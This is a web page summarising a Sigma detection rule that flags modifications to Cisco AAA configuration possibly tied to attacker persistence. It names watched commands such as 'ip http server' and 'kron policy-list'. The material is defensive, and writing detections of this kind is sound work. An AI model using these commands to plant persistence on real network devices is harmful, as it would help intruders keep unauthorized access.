heroui logo

Cisco Modify Configuration

Sigma Rules

View Source
Summary
This rule is designed to detect unauthorized modifications to Cisco AAA (Authentication, Authorization, and Accounting) configurations that may indicate adversarial activity focused on persistence or impact within a network environment. By monitoring for specific keywords associated with configuration commands — like 'ip http server' and 'kron policy-list' — the rule aims to identify potentially malicious changes that could be exploited for ongoing access or to facilitate further attacks. The rule focuses on changes that could leverage the Cisco infrastructure capabilities to maintain an attacker's foothold in the network, thereby raising alerts for significant commands commonly used in configuration changes. Effective monitoring of these configurations is essential for maintaining security and detecting an adversary's attempts to solidify their presence. The potential for false positives exists, particularly when legitimate administrators execute changes as part of their normal operational procedures. Thus, careful analysis and context consideration are necessary for response actions.
Categories
  • Network
Data Sources
  • Network Traffic
  • Application Log
  • Command
Created: 2019-08-12